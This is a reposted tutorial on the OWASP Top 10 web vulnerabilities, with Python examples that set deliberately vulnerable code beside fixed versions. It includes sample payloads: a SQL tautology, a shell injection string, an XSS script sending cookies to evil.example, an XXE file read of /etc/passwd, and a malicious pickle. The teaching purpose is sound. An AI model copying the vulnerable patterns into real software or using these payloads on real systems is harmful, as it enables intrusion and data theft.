Summary of the common Top 10 web vulnerabilities (TOP 10 web vulnerabilities introduction)
  mXUEUZASvLlK, 2 November 2023

1. Injection

(1)The concept of injection

Injection refers to flaws such as SQL injection, OS command injection and LDAP injection, which occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's crafted data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Detailed source with Chinese-English comparison: https://t.zsxq.com/13jkeXo1n

(2) Classification of injection

Injection usually means SQL injection and OS (operating system) command injection.

SQL injection: SQL fragments are inserted into a web form field, a query string in a URL, or another part of a page request so that the server ends up executing attacker-chosen SQL. In other words, the attacker uses the existing application to pass (malicious) SQL to the back-end database engine for execution; on a site with this flaw, entering crafted SQL into a form can expose or alter the database instead of running the statement the designer intended.

Defense for SQL injection:

1: Strictly validate and escape input; prefer parameterized queries (prepared statements) so that user data is never concatenated into SQL text.

2: Strictly define the data type and length of every input.

3: Enable an anti-SQL-injection policy on the WAF as an additional layer, not as the only defense.

4: Strictly restrict the privileges of the account the website uses to access the database (least privilege).
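The following is an added example, not code from the original article: a login check that concatenates user input into SQL, beside the parameterized form that defense 1 calls for. It uses an in-memory SQLite database with a constructed `users` table; the table layout, the credentials and the `PAYLOAD` string are assumptions for illustration, and the password is stored in clear text only to keep the injection visible (real systems store password hashes).

```python
"""SQL injection: a string-built query beside its parameterized fix.

Added example (not code from the original article). The users table, the
credentials and the payload are constructed for illustration.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database with one user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Concatenates user input into the SQL text, so the input becomes part
    of the query grammar and a tautology bypasses the password check."""
    sql = (f"SELECT COUNT(*) FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Parameterized query: values travel separately from the SQL text, so
    quotes and keywords in the input are data, never syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


# Classic tautology: closes the password literal and ORs in a true condition,
# giving  ... AND password = '' OR '1'='1'  in the vulnerable query.
PAYLOAD = "' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected payload:", login_vulnerable(db, "alice", PAYLOAD))
    print("parameterized, same payload: ", login_safe(db, "alice", PAYLOAD))
    print("parameterized, real password:", login_safe(db, "alice", "correct-horse"))
```

The parameterized version needs no escaping of its own: the driver binds the values after the statement has been parsed, which is why defense 1 puts prepared statements ahead of escaping.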

OS command injection: Most languages used for web development can execute OS (operating system) commands through a shell. When a program runs an OS command through the shell, or uses a library function that internally invokes the shell, untrusted input that reaches the command line can cause arbitrary OS commands to run. This is known as OS command injection.

Defense for OS command injection:

1: Use safe functions to escape or quote every parameter passed to the OS command.

2: Do not pass externally supplied strings to command-line arguments without validation.

3: Prefer an implementation that does not invoke OS commands at all.

Not calling functions that go through the shell not only eliminates the possibility of OS command injection, but also removes the overhead of spawning a shell and a child process, which can improve the application's performance in several ways.
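As an added example (not code from the original article), the three defenses above in working form: a command built as one shell string, the same call as an argv list with no shell, and an allowlist check in front of it. To run offline it uses the Python interpreter itself as the "OS command" that echoes its argument; a real application would call ping, convert or tar the same way. The host-name pattern and the `PAYLOAD` string are assumptions for this example.

```python
"""OS command injection: a shell command string beside an argv list.

Added example (not code from the original article). The echo program,
the host-name allowlist and the payload are constructed for illustration.
"""
import re
import shlex
import subprocess
import sys

# Stand-in for the external command: prints its first argument.
ECHO_PROGRAM = "import sys; print('arg=' + sys.argv[1])"


def run_vulnerable(user_input: str) -> str:
    """Builds one string and hands it to /bin/sh. Shell metacharacters in
    user_input (; | & $ backquotes) are interpreted as shell syntax."""
    cmd = f'{shlex.quote(sys.executable)} -c "{ECHO_PROGRAM}" {user_input}'
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def run_argv(user_input: str) -> str:
    """argv list, no shell: the whole input is exactly one argument, so
    metacharacters are passed through literally and nothing extra runs."""
    argv = [sys.executable, "-c", ECHO_PROGRAM, user_input]
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def run_safe(user_input: str) -> str:
    """Allowlist validation first (defense 2), then the argv form (defense 1)."""
    if not HOSTNAME_RE.fullmatch(user_input):
        raise ValueError(f"rejected host name: {user_input!r}")
    return run_argv(user_input)


# Constructed attacker input: a valid-looking host followed by a second command.
PAYLOAD = "example.com; echo INJECTED"


if __name__ == "__main__":
    print(run_vulnerable(PAYLOAD), end="")   # arg=example.com, then INJECTED
    print(run_argv(PAYLOAD), end="")         # arg=example.com; echo INJECTED
    print(run_safe("example.com"), end="")   # arg=example.com
```

Note that `run_argv` alone already stops the injection: the attacker's `; echo INJECTED` becomes part of a single argument. The allowlist in `run_safe` is the second layer, for cases where the called program itself interprets its argument (for example a leading `-` read as an option).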

2. Sensitive data exposure

(1) Introduction

In recent years, sensitive data exposure has become one of the most common and most damaging attacks. Sensitive information generally includes passwords, financial data, medical data and so on. When a web application or API does not encrypt sensitive data, or protects it improperly, the data is easily obtained by attackers, who may use it to commit further crimes; unencrypted information is therefore very easy to steal and abuse. Not long ago it was revealed that Facebook leaked a large amount of user information, and 12306 has also leaked user information many times. Now that sensitive data exposure ranks among the top three entries of the OWASP Top 10, it is clearly a very serious problem.

(2) Defense

1: Classify the data the system processes, stores or transmits, and apply access control according to the classification.

2: Encrypt important data at rest, and transmit it only in ciphertext (over TLS).

3: Discard sensitive data that is no longer needed as soon as possible, and allow only designated users to access sensitive data.

3. Broken authentication

(1) Introduction

When authentication and session management functions are implemented incorrectly, attackers can recover passwords, keys or session tokens, or temporarily or permanently assume another user's identity.

Identity authentication: Authentication is most commonly used for system login, usually in the form of a username and password; where security requirements are higher, verification codes, client certificates, USB keys (UKey) and so on are added.

Session management: HTTP itself is stateless, so authentication state is carried by a session mechanism. The result of a successful login is usually a token placed in a cookie; subsequent requests only need to present that token, and if it validates, the user does not have to log in again.

(2) Defense

Methods for defending against broken authentication and session management:

1: Distinguish between public and restricted areas: the public areas of the site allow anonymous access, while restricted areas are accessible only to specified users.

2: Support password expiry: allow (or require) users to change their password after a certain period.

3: Ability to disable accounts: accounts can be disabled after an attack is detected to avoid further losses.

4: Require users to use strong passwords.

5: Never transmit usernames and passwords in plain text: use TLS (HTTPS) to encrypt the data stream, and protect cookies as well (encrypt or sign them, and mark them Secure so they are only sent over TLS).
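The following added example (not code from the original article) puts defenses 2 to 5 together with the session description above: a minimum password policy, salted PBKDF2 password hashing with a constant-time comparison, and random session tokens that expire and are revoked on the server at logout. The in-memory dictionaries stand in for a database; the iteration count, the 15-minute lifetime and the policy rule are assumptions for this example.

```python
"""Password storage and session handling for the defenses listed above.

Added example (not code from the original article). The in-memory stores,
the iteration count, the session lifetime and the password policy are
assumptions for illustration.
"""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

PBKDF2_ITERATIONS = 600_000   # order of magnitude OWASP recommends for SHA-256
SESSION_TTL = 15 * 60         # seconds

_users: Dict[str, Tuple[bytes, bytes]] = {}    # name -> (salt, hash)
_sessions: Dict[str, Tuple[str, float]] = {}   # token -> (name, expires_at)
_DUMMY = (b"\0" * 16, b"\0" * 32)              # used when the user is unknown


def _hash(pw: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ITERATIONS)


def password_is_strong(pw: str) -> bool:
    """Policy assumed here: at least 12 characters mixing letters and digits."""
    return (len(pw) >= 12
            and any(c.isalpha() for c in pw)
            and any(c.isdigit() for c in pw))


def register(name: str, pw: str) -> None:
    if not password_is_strong(pw):
        raise ValueError("password does not meet policy")
    salt = secrets.token_bytes(16)               # per-user random salt
    _users[name] = (salt, _hash(pw, salt))       # only the hash is stored


def login(name: str, pw: str, now: Optional[float] = None) -> Optional[str]:
    """Returns a session token, or None. Always performs one hash so timing
    does not reveal whether the username exists."""
    now = time.time() if now is None else now
    salt, stored = _users.get(name, _DUMMY)
    ok = hmac.compare_digest(_hash(pw, salt), stored)   # constant-time compare
    if name not in _users or not ok:
        return None
    token = secrets.token_urlsafe(32)                   # 256 random bits
    _sessions[token] = (name, now + SESSION_TTL)
    return token


def user_for(token: str, now: Optional[float] = None) -> Optional[str]:
    """Resolves a token to a user, dropping it if expired or revoked."""
    now = time.time() if now is None else now
    entry = _sessions.get(token)
    if entry is None:
        return None
    name, expires_at = entry
    if now >= expires_at:
        _sessions.pop(token, None)
        return None
    return name


def logout(token: str) -> None:
    """Server-side revocation: the token stops working immediately."""
    _sessions.pop(token, None)
```

The token is looked up on the server rather than trusted on its own, which is what makes logout and account disabling (defense 3) take effect at once; a self-contained token such as a JWT needs a server-side revocation list to get the same property.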

4. Cross-site scripting (XSS)

(1) Introduction

Cross-site scripting is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets. A malicious attacker inserts script code into a web page; when a user browses that page, the embedded script executes in the user's browser, and the attack reaches its target through the victim's browser. XSS attacks target users, not the server.

(2) Classification

XSS is divided into three categories: reflected XSS, stored XSS and DOM-based XSS.

(3) Principle

Stored XSS: Persistent; the payload is stored on the server, for example in a profile field or a published article. If input is not filtered, or is filtered loosely, the code is saved on the server and executes whenever a user visits the page. This type is the most dangerous and readily leads to worms and cookie theft.

Reflected XSS: Non-persistent; the victim must be tricked into clicking a crafted link to trigger the payload (nothing is stored on the server). It commonly appears in search pages that echo the query back.

DOM-based XSS: Does not pass through the back end. It is based on the Document Object Model (DOM): the attacker places malicious JavaScript in the request (for example in the URL fragment), and the server's response does not contain the script in any form. When the browser processes the response, client-side code reads the untrusted value from the DOM and writes it into a dangerous sink, which is what produces the vulnerability.

(4) Defense

1: Stored: filter input on the back end and escape HTML tags and special characters when the data is output.

2: Reflected: escape special characters in any value echoed back into the page, according to the output context (HTML body, attribute, JavaScript, URL).

3: DOM-based: audit client-side code for dangerous sinks such as innerHTML, document.write and eval, and never feed them untrusted data.

4: To limit cookie theft through XSS, set the HttpOnly flag on the session cookie.
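As an added example (not code from the original article), a reflected-XSS search page rendered unescaped and then escaped for the HTML-body context (defense 2; the same output escaping applies to stored data under defense 1), plus the Set-Cookie value with HttpOnly from defense 4. The page template, the `shop.example` URL, the payload and the cookie attributes are assumptions for illustration.

```python
"""Reflected XSS: a search page that echoes the query unescaped, its escaped
form, and a session cookie with HttpOnly.

Added example (not code from the original article). The template, URL,
payload and cookie attributes are constructed for illustration.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

TEMPLATE = "<html><body><h1>Results for: {q}</h1></body></html>"


def search_param(url: str) -> str:
    """Extracts the q= query parameter as the server would receive it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the raw parameter into the HTML body: script tags in the
    query are parsed and executed by the victim's browser."""
    return TEMPLATE.format(q=search_param(url))


def render_safe(url: str) -> str:
    """HTML-body context: & < > " ' become entities, so the browser shows
    the payload as text. Attribute, JavaScript and URL contexts need their
    own encoding; this escape alone is not enough there."""
    return TEMPLATE.format(q=html.escape(search_param(url), quote=True))


def session_cookie_header(token: str) -> str:
    """Set-Cookie value: HttpOnly hides the cookie from document.cookie,
    Secure restricts it to HTTPS, SameSite limits cross-site sending."""
    return f"session={token}; HttpOnly; Secure; SameSite=Lax; Path=/"


# Constructed attacker link: the query parameter carries a cookie-stealing script.
PAYLOAD = "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
CRAFTED_URL = "https://shop.example/search?" + urlencode({"q": PAYLOAD})


if __name__ == "__main__":
    print(render_vulnerable(CRAFTED_URL))
    print(render_safe(CRAFTED_URL))
    print("Set-Cookie:", session_cookie_header("opaque-token"))
```

With HttpOnly set, the script in `PAYLOAD` would still run on the vulnerable page but `document.cookie` would not contain the session value, which is exactly the limited protection defense 4 describes; escaping the output is what actually removes the vulnerability.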

5. XML External Entities (XXE)

(1) Introduction

XXE (XML External Entity injection): when an XML document is allowed to reference external entities, an attacker can craft malicious XML that causes arbitrary file reads, server-side requests, command execution in some environments, or denial of service on the server.

XML is a markup language for describing structured electronic documents: it can label data, define data types, and is a meta-language that lets users define their own markup. An XML document consists of the XML declaration, an optional DTD (document type definition) and the document elements; the DTD is where entities, including external ones, are declared.

(2) Defense

1: Use the option your language's XML parser provides to disable DTDs and external entity resolution.

2: Validate and filter user-submitted XML data.
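As an added example (not code from the original article), a constructed XXE document of the file-read kind beside a parse function that applies defense 2 before defense 1 has to matter: any DOCTYPE is rejected up front, then the document is parsed normally. Python's `xml.etree.ElementTree` does not fetch external entities on its own, but that is a parser default rather than a stated policy, so the check makes the rule explicit and also stops internal-entity expansion ("billion laughs"). The order documents and element names are assumptions for illustration.

```python
"""XXE: refuse DTDs in untrusted XML rather than trusting parser defaults.

Added example (not code from the original article). The order documents
are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET

# Constructed attacker document: declares an external entity that points at a
# local file and references it in the body (the classic file-read XXE).
MALICIOUS_XML = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><item>&xxe;</item></order>"""

BENIGN_XML = '<?xml version="1.0"?><order><item>widget</item><item>bolt</item></order>'

_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def parse_untrusted_xml(data) -> ET.Element:
    """Rejects any document carrying a DTD (the only place entities can be
    declared), then parses with the standard parser."""
    raw = data if isinstance(data, bytes) else data.encode("utf-8")
    if _DOCTYPE_RE.search(raw):
        raise ValueError("DOCTYPE/DTD is not allowed in untrusted XML")
    return ET.fromstring(raw)


def order_items(data) -> list:
    """Application-level use: the item names from a validated order."""
    return [el.text for el in parse_untrusted_xml(data).iter("item")]


if __name__ == "__main__":
    print(order_items(BENIGN_XML))
    try:
        order_items(MALICIOUS_XML)
    except ValueError as exc:
        print("rejected:", exc)
```

Where a richer parser is in use, the same policy is set on the parser itself: in lxml, `etree.XMLParser(resolve_entities=False, no_network=True)`; in Java's JAXP parsers, the `http://apache.org/xml/features/disallow-doctype-decl` feature. Checking for `<!DOCTYPE` in the raw bytes remains a cheap second layer that does not depend on remembering the parser flag.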

6. Security misconfiguration

(1) Introduction

Security misconfiguration is a very common weakness. Improper configuration by operators (default settings, temporary configuration left in place, open cloud storage, missing HTTP security headers, verbose error messages containing sensitive information) lets attackers use those settings to gain higher privileges. Misconfiguration can occur at every layer: platform, web server, application server, database, framework and code.

(2) Defense

1: Make sure deployed services contain no unnecessary features, components, documentation or samples; remove or do not install features and frameworks that are not needed.

2: Keep track of the versions of system services and patch discovered vulnerabilities promptly.

3: When assigning permissions to files and other resources, apply the principle of least privilege according to the needs of the job.

4: Automate installation and deployment so that a hardened configuration is applied repeatably.

5: Perform vulnerability scanning and security audits.

7. Broken access control

(1) Introduction

Access control protects resources from unauthorized access and use; the most widely used mechanism is role-based access control. Broken access control is when an attacker escalates privileges by some means and bypasses the access checks, so that the attacker can act as a user, administrator or privileged user, or create, read, update or delete any record.

(2) Defense

1: Deny access by default to everything except public resources.

2: Implement the access control mechanism once and reuse it consistently throughout the application.

3: Build the access control model so that it enforces ownership of records, instead of accepting that the user may create, read, update or delete any record.

4: JWT tokens should be invalidated on the server after the user logs out.
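As an added example (not code from the original article), defenses 1 to 3 in code: an order lookup that trusts the id from the request (an insecure direct object reference) beside a default-deny version that routes every decision through one reusable policy function enforcing record ownership. The orders, users and roles are constructed.

```python
"""Broken access control: an insecure direct object reference beside a
default-deny lookup that enforces record ownership.

Added example (not code from the original article). The orders, users
and roles are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict


@dataclass(frozen=True)
class User:
    name: str
    role: str   # "customer" or "admin"


# Constructed records: the key is the id a client would send in the URL.
ORDERS: Dict[int, dict] = {
    101: {"owner": "alice", "total": 42},
    102: {"owner": "bob", "total": 99},
}


class Forbidden(Exception):
    pass


def get_order_idor(user: User, order_id: int) -> dict:
    """Vulnerable: the caller is authenticated, but the id from the request is
    trusted, so any logged-in user reads any order by changing the number."""
    return ORDERS[order_id]


def can_read(user: User, order: dict) -> bool:
    """One reusable policy function (defense 2). Anything not explicitly
    granted here is denied (defense 1)."""
    if user.role == "admin":
        return True
    return user.role == "customer" and order["owner"] == user.name


def get_order(user: User, order_id: int) -> dict:
    """Ownership-enforcing lookup (defense 3)."""
    order = ORDERS.get(order_id)
    if order is None or not can_read(user, order):
        # Same failure for missing and foreign records, so ids cannot be enumerated.
        raise Forbidden(f"order {order_id}")
    return order


if __name__ == "__main__":
    alice = User("alice", "customer")
    print("IDOR lets alice read bob's order:", get_order_idor(alice, 102))
    try:
        get_order(alice, 102)
    except Forbidden as exc:
        print("ownership check refuses:", exc)
```

Keeping the decision in `can_read` rather than scattered across handlers is what makes defense 2 practical: a new role or a new resource type changes one function, and a handler that forgets to call it is easy to spot in review.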

8. Insecure deserialization

(1) Introduction

Serialization: converting an object's state into a form that can be stored or transmitted, usually a byte stream.

Deserialization: the exact reverse of serialization.

(2) Principle

Serialization turns an object into a byte stream that can be kept in memory, in a file or in a database, and deserialization turns that byte stream back into an object. In Java, the writeObject method of ObjectOutputStream serializes and the readObject method of ObjectInputStream deserializes. The vulnerability arises when an application deserializes attacker-controlled data: an unintended object may be constructed, which can lead to remote code execution. Likewise, if the application contains classes whose behaviour changes during or after deserialization, the attacker can alter application logic or achieve remote code execution. These are called object and data structure attacks.

(3) Defense

1: The safest approach is not to accept serialized objects from untrusted sources, or to use a serialization format that permits only primitive data types.

2: Perform strict type checking before deserialization. Because validation rules can be probed and bypassed by attackers, defense must not rely on this alone; use it as a supplement to an integrity-check (signing) scheme.

3: Run deserialization code in an isolated, low-privilege environment.

4: Log deserialization exhaustively, monitor it, and alert when a suspected deserialization attack is found.
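As an added example (not code from the original article), the principle above shown with Python's pickle, which behaves like Java's readObject here: a constructed payload whose `__reduce__` makes the loader call a function of the attacker's choosing, beside an Unpickler that applies defense 2 by resolving only allowlisted classes. `Report` is a stand-in for an application class, and `os.getcwd` stands in for the `os.system` call an attacker would really use; it was chosen so the demonstration has no side effects.

```python
"""Insecure deserialization: a pickle that calls a function on load, and an
allowlisting Unpickler that refuses it.

Added example (not code from the original article). Report, Evil and the
payloads are constructed for illustration.
"""
import io
import os
import pickle


class Report:
    """Legitimate application type that we do want to deserialize."""
    def __init__(self, title: str):
        self.title = title


class Evil:
    """pickle honours __reduce__: on load it calls the returned callable with
    the returned arguments, so the payload runs before any type check."""
    def __reduce__(self):
        return (os.getcwd, ())   # an attacker would return (os.system, ("...",))


class RestrictedUnpickler(pickle.Unpickler):
    """Only globals on the allowlist can be resolved; everything else fails
    before any object is built."""
    ALLOWED = {(__name__, "Report")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_trusting(data: bytes):
    """What most code does: pickle.loads runs whatever the stream says."""
    return pickle.loads(data)


def load_restricted(data: bytes):
    """Defense 2: type allowlist enforced inside the deserializer."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Constructed payloads.
MALICIOUS = pickle.dumps(Evil())
LEGIT = pickle.dumps(Report("quarterly"))


if __name__ == "__main__":
    print("trusting load returned:", load_trusting(MALICIOUS))   # result of os.getcwd()
    print("restricted load:", load_restricted(LEGIT).title)
    try:
        load_restricted(MALICIOUS)
    except pickle.UnpicklingError as exc:
        print("restricted load refused:", exc)
```

The allowlist is a supplement, as defense 2 says, not the whole answer: the byte stream should also be signed (for example with an HMAC checked before unpickling) so that only streams the application itself produced ever reach the loader, and a format such as JSON should be preferred where only plain data needs to cross the boundary (defense 1).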

9. Using components with known vulnerabilities

(1) Introduction

Modern servers use many components (libraries, frameworks and other software modules), and they run with the same privileges as the application. If a component with a known vulnerability is exploited, the result can be serious data loss or server takeover. Applications and APIs that depend on vulnerable components undermine the application's defenses, enable a wide range of attacks, and can have serious impact.

(2) Defense

1: Inventory the components and versions in use, including all transitive dependencies.

2: Update components and referenced libraries to the latest patched versions.

3: Establish a security policy governing the use of components.
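As an added example (not code from the original article), the inventory step of defense 1 and the "is the pinned version below the fix" comparison that drives defense 2: a pinned lockfile is parsed and checked against an advisory table. The lockfile text, the `acme-*` package names and the `EXAMPLE-2023-*` advisories are constructed and refer to no real software or CVE; a real pipeline would pull advisories from a database such as OSV or run a tool like pip-audit or OWASP Dependency-Check.

```python
"""Known-vulnerable components: check pinned dependencies against an
advisory list.

Added example (not code from the original article). The lockfile,
package names and advisories are constructed and are not real.
"""
import re
from typing import Dict, List, Tuple

# Constructed lockfile with pinned versions, including a transitive dependency.
REQUIREMENTS = """\
# generated lockfile (constructed)
acme-http==2.19.0
acme-yaml==5.3.1
acme-web==2.3.2
acme-json==1.0.0    # pulled in by acme-web
"""

# Constructed advisories: package -> (first fixed version, advisory id).
ADVISORIES: Dict[str, Tuple[str, str]] = {
    "acme-http": ("2.20.0", "EXAMPLE-2023-0001"),
    "acme-yaml": ("5.4", "EXAMPLE-2023-0002"),
    "acme-web": ("2.2.0", "EXAMPLE-2023-0003"),   # already fixed at 2.3.2
}

_PIN_RE = re.compile(r"^\s*([A-Za-z0-9_.-]+)==([0-9][0-9.]*)")


def parse_version(v: str) -> Tuple[int, ...]:
    """Numeric dotted versions only; tuple comparison gives the right order."""
    return tuple(int(p) for p in v.split("."))


def parse_requirements(text: str) -> Dict[str, str]:
    """name -> pinned version; comments and blank lines are skipped."""
    pins = {}
    for line in text.splitlines():
        m = _PIN_RE.match(line)
        if m:
            pins[m.group(1).lower()] = m.group(2)
    return pins


def find_vulnerable(pins: Dict[str, str],
                    advisories: Dict[str, Tuple[str, str]] = ADVISORIES
                    ) -> List[Tuple[str, str, str, str]]:
    """(package, installed, fixed_in, advisory) for every pin below the fix."""
    hits = []
    for name, installed in sorted(pins.items()):
        if name in advisories:
            fixed_in, adv_id = advisories[name]
            if parse_version(installed) < parse_version(fixed_in):
                hits.append((name, installed, fixed_in, adv_id))
    return hits


if __name__ == "__main__":
    for name, installed, fixed_in, adv_id in find_vulnerable(parse_requirements(REQUIREMENTS)):
        print(f"{adv_id}: {name} {installed} is vulnerable, upgrade to >= {fixed_in}")
```

The check only works because the versions are pinned, including the transitive `acme-json`; an unpinned dependency list cannot be inventoried, which is why defense 1 comes before defense 2.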

10. Insufficient logging and monitoring

(1) Introduction

Insufficient logging and monitoring, together with missing or ineffective integration with incident response, allows attackers to attack systems further, maintain persistence, pivot to more systems, and tamper with, extract or destroy data. Most breach studies show that the time to detect a breach exceeds 200 days, and that breaches are usually discovered by external parties rather than through internal processes or monitoring.

Logging: Logging is one of the most important functions of a system. Logs include successful logins, failed logins, access control decisions and so on, and record the server's activity.

(2) Defense

1: Ensure that all logins, access control failures and input validation failures are logged with enough user context to identify suspicious or malicious accounts, and retained long enough for later forensics.

2: Establish an effective monitoring and alerting mechanism so that suspicious activity is detected and responded to within an acceptable time.

3: Improve the logging system so that it can collect and monitor all kinds of log information.

4: Back up the logs promptly and retain them for a sufficiently long period.
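As an added example (not code from the original article), the kind of detection defense 2 calls for, run over the login records defense 1 asks to keep: a sliding-window count of failed logins per source IP that raises an alert when a burst crosses a threshold. The log line format, the sample lines (which also include one malformed line) and the threshold of 5 failures within 60 seconds are assumptions for this example.

```python
"""Monitoring: detect a password-guessing burst in authentication logs.

Added example (not code from the original article). The log format, the
sample lines and the threshold are constructed for illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Iterable, List, Tuple

LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) auth (?P<result>FAIL|OK) "
    r"user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)

# Constructed log: one IP sprays several accounts; one user mistypes twice.
SAMPLE_LOG = """\
2023-11-02T10:00:01 auth FAIL user=alice ip=203.0.113.7
2023-11-02T10:00:03 auth FAIL user=bob ip=203.0.113.7
2023-11-02T10:00:04 auth FAIL user=carol ip=198.51.100.4
2023-11-02T10:00:05 auth FAIL user=carol ip=203.0.113.7
2023-11-02T10:00:07 auth FAIL user=dave ip=203.0.113.7
2023-11-02T10:00:09 auth FAIL user=erin ip=203.0.113.7
2023-11-02T10:00:11 auth FAIL user=frank ip=203.0.113.7
2023-11-02T10:00:30 auth OK user=alice ip=198.51.100.4
this line is not in the expected format and is skipped
2023-11-02T10:02:00 auth FAIL user=carol ip=198.51.100.4
"""


def detect_bruteforce(lines: Iterable[str], threshold: int = 5,
                      window_s: int = 60) -> List[Tuple[str, str]]:
    """Sliding window per source IP: returns (ip, timestamp) at the moment the
    number of failures inside the window reaches the threshold."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["result"] != "FAIL":
            continue                      # malformed lines and successes are ignored
        ts = datetime.fromisoformat(m["ts"])
        window = recent[m["ip"]]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_s:
            window.popleft()              # drop failures older than the window
        if len(window) >= threshold:
            alerts.append((m["ip"], m["ts"]))
            window.clear()                # one alert per burst, then count again
    return alerts


if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"ALERT {when} password guessing from {ip}")
```

Keying the window on the source IP rather than the user name is what catches password spraying, where each account sees only one failure; a production rule would keep both counters, and the user and IP fields in every line are the "user context" that defense 1 asks the log to retain.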

[Copyright notice] The content of this article comes from moduyun community user originals, third-party contributions and reposts; copyright belongs to the original authors. This site's purpose is to convey more information; it does not own the copyright and bears no corresponding legal responsibility. If you find content in this community suspected of plagiarism, please report it by e-mail with supporting evidence; once verified, the community will immediately delete the infringing content. Report e-mail: cloudbbs@moduyun.com

Last edited 8 November 2023